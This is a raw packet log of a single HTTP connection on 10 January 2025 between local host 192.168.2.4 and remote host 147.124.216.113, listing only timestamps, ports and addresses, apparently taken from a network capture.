Jan 10, 2025 08:59:18.096460104 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096476078 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096499920 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096503973 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096519947 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096534014 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096549988 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096564054 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096580029 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096595049 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096601009 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096611023 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096626997 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096649885 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096694946 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096709967 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096714973 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096724033 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096739054 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096752882 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096757889 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096767902 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096782923 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096796989 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096812010 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096821070 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096827030 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096843958 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096857071 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.096918106 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.096972942 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.097284079 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097299099 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097312927 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097326994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097341061 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097352982 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.097356081 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097371101 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097384930 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097399950 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097414017 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097429037 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097443104 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097449064 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.097456932 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097522020 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.097717047 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097733021 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097748041 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097848892 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097852945 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:18.097867012 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:18.097944975 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.249912977 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.249944925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.249960899 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.249974966 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.249990940 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.249991894 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250005007 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250020981 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250027895 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250047922 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250080109 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250094891 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250108957 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250116110 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250144958 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250230074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250267982 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250282049 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250297070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250298977 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250328064 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250361919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250457048 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250471115 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250484943 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250488043 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250499964 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250514030 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250519991 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250528097 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250541925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250551939 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250579119 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250912905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250926971 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250941038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250955105 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250958920 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250968933 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250983000 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.250991106 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.250998020 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251013041 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251019001 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251051903 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251192093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251207113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251219988 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251234055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251238108 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251247883 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251262903 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251266003 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251296997 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251533031 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251547098 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251560926 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251574993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251581907 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251589060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251602888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251614094 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251616955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251631021 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251643896 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251645088 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251658916 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251661062 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251673937 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251688004 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251688004 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251701117 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251714945 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251729012 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.251729012 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.251754045 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.252132893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.252147913 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.252161980 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.252171040 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.252176046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:21.252196074 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:21.292093992 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836150885 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836173058 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836189032 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836208105 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836222887 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836237907 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836253881 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836267948 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836283922 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836383104 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836570978 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836618900 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836646080 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836656094 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836689949 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836714029 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836724043 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836756945 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836771965 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836791039 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836822987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836847067 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836857080 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836890936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836906910 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.836925030 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836960077 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.836967945 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837080002 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837112904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837146997 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837146997 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837179899 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837208033 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837208033 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837212086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837244034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837268114 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837276936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837308884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837332010 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837341070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837373018 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837399006 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837425947 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837457895 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837483883 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837491035 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837524891 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837538004 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837606907 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837656021 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837681055 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837702036 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837733984 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837764025 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837766886 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837799072 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837825060 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837831974 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837867022 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837882996 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.837908983 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837945938 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.837971926 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838052988 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838084936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838099003 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838118076 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838150978 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838176966 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838184118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838217974 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838243008 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838387012 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838419914 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838444948 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838452101 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838484049 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838507891 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838515043 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838546991 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838571072 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.838579893 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838613033 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.838635921 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.886161089 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.977670908 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977714062 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977751970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977785110 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977840900 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977902889 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977952003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.977984905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978017092 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978049994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978104115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978104115 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978128910 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978163004 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978195906 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978203058 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978203058 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978229046 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978229046 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978262901 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978298903 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978327036 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978358984 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978391886 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978409052 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978409052 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978409052 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978423119 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978455067 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978471041 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978504896 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978507996 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978538036 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978545904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978579044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978610039 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978615046 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978641033 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978666067 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978673935 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978708029 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978720903 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978739023 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978770971 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978797913 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978802919 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978835106 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978861094 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978868008 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978900909 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978918076 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.978935957 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978967905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.978977919 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979001045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979034901 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979053020 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979063034 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979104996 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979109049 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979136944 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979170084 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979202032 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979219913 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979253054 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979266882 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979285002 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979337931 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979338884 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979373932 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979407072 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979418993 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979439974 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979471922 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979487896 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979505062 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979537964 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979553938 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979571104 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979603052 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979635000 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979635954 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979671955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979693890 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:24.979809999 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979844093 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:24.979865074 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.026652098 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050209999 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050254107 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050319910 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050370932 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050405025 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050404072 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050440073 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050467014 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050517082 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050554037 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050554991 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050554991 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050580978 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050585985 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050626040 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050633907 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050654888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050688028 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050719976 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050745964 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050751925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050772905 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050786972 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050832987 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.050837040 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050893068 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050925970 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050947905 CET	49736	80	192.168.2.4	147.124.216.113
